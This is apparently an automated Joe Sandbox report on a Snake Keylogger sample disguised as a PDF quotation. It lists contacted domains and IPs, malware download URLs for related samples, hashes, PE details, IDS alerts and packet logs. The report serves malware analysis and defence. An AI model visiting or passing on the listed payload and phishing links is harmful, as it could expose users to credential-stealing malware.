http://checkip.dyndns.com	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://filetransfer.io	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dapper-plus.net	QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	filetransfer.io	European Union	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557896
Start date and time:	2024-11-18 18:10:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 79% Number of executed functions: 251 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QUOTATION_NOVQTRA071244PDF.scr.exe, PID 7628 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QUOTATION_NOVQTRA071244PDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
12:11:06	API Interceptor	85764x Sleep call for process: QUOTATION_NOVQTRA071244PDF.scr.exe modified
12:12:11	API Interceptor	7033x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
193.122.6.168	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Solicitud de cotizacion Stro1268975.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	rFACTURASALBARANESPENDIENTES.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
s23.filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
filetransfer.io	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rBankRemittance_pdf.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.67.200.96
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RE Invoice Request (Nov 2024).exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
CLOUDFLARENETUS	MG-Docu6800001.exe	Get hash	malicious	GuLoader	Browse	172.67.208.107
	payload.vbs	Get hash	malicious	Unknown	Browse	172.67.165.138
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	104.18.10.207
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://t.co/D4HGMmKLnL	Get hash	malicious	Unknown	Browse	162.159.140.229
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
CLOUDFLARENETUS	MG-Docu6800001.exe	Get hash	malicious	GuLoader	Browse	172.67.208.107
	payload.vbs	Get hash	malicious	Unknown	Browse	172.67.165.138
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	104.18.10.207
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://t.co/D4HGMmKLnL	Get hash	malicious	Unknown	Browse	162.159.140.229
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	188.114.96.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.9072581328336415
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_NOVQTRA071244PDF.scr.exe
File size:	1'484'800 bytes
MD5:	e717ed3845849e9a3bfbb53c8ecb87f2
SHA1:	7ae3a696867e9fb90d2633672801ff8dcc6d0d6c
SHA256:	eb52bf1a53d28600ebc350ea1ffdffe1fb619ac9bd2070200fa8b39c8f30a8cd
SHA512:	97aecfe61a881a1791a396ee92f6c3b18a7a21bcbfb80f5cda69f81678863119c2220eb102e7233512483f95c2588a0e5955762036ced72d658ab2b9a936b8da
SSDEEP:	12288:h1Ql5Z04nr+u96ovJI3pmnbjvLb1H9u60Bj3tqxpopll2L+aB:hWLP9Z4GnLBH9/Qtqczha
TLSH:	C465194B23ECA625E1BE8B376AF1095087B3E446D2E1EB9B5DC8B8F54443724794C363
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...y.:g.........."...................... ....@...... ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673AE979 [Mon Nov 18 07:15:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16c000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x169edc	0x16a000	2323425eca8548b3eb7790259b71e48c	False	0.3341934457009669	data	5.908687881078182	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16c000	0x600	0x600	cbd2a15ce31807f9394f1343887d7f15	False	0.4309895833333333	data	4.223586510867295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x16c0a0	0x368	data			0.411697247706422
RT_MANIFEST	0x16c408	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T18:12:10.216082+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49979	193.122.6.168	80	TCP
2024-11-18T18:12:11.762545+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49979	193.122.6.168	80	TCP
2024-11-18T18:12:12.829550+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49981	188.114.97.3	443	TCP
2024-11-18T18:12:13.731332+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49982	193.122.6.168	80	TCP
2024-11-18T18:12:14.514004+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49983	188.114.97.3	443	TCP
2024-11-18T18:12:22.420486+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49991	188.114.97.3	443	TCP
2024-11-18T18:12:24.100715+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49993	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:11:07.396827936 CET	49707	80	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:07.401757956 CET	80	49707	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:07.401890039 CET	49707	80	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:07.403615952 CET	49707	80	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:07.408392906 CET	80	49707	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:08.328608990 CET	80	49707	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:08.371843100 CET	49707	80	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:08.451499939 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:08.451550007 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:08.451611042 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:08.501842976 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:08.501866102 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:09.290292978 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:09.290380001 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:09.296833038 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:09.296854019 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:09.297291994 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:09.340547085 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:09.415769100 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:09.463367939 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.102929115 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.103117943 CET	443	49708	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.103239059 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.121067047 CET	49708	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.135145903 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.135191917 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.138093948 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.138528109 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.138544083 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.780833960 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.780905962 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.783700943 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.783709049 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.784012079 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:10.785269976 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:10.831341028 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.179591894 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.179641008 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.179692030 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.179733992 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.179933071 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.179972887 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.179982901 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.180655956 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.180682898 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.180701971 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.180711031 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.180757046 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.180764914 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.184350967 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.184421062 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.184428930 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.231200933 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.296627998 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.296986103 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.297029018 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.297065020 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.297110081 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.297163010 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.297414064 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.297841072 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.297894955 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.297907114 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.298270941 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.298314095 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.298326969 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.298341036 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.298389912 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.413507938 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.413784981 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.413889885 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.413922071 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414047003 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414089918 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.414099932 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414587021 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414637089 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.414647102 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414906979 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.414952040 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.414961100 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.415757895 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.415780067 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.415806055 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.415816069 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.415854931 CET	49714	443	192.168.2.10	188.114.96.3
Nov 18, 2024 18:11:19.530745029 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.530834913 CET	443	49714	188.114.96.3	192.168.2.10
Nov 18, 2024 18:11:19.530884027 CET	49714	443	192.168.2.10	188.114.96.3
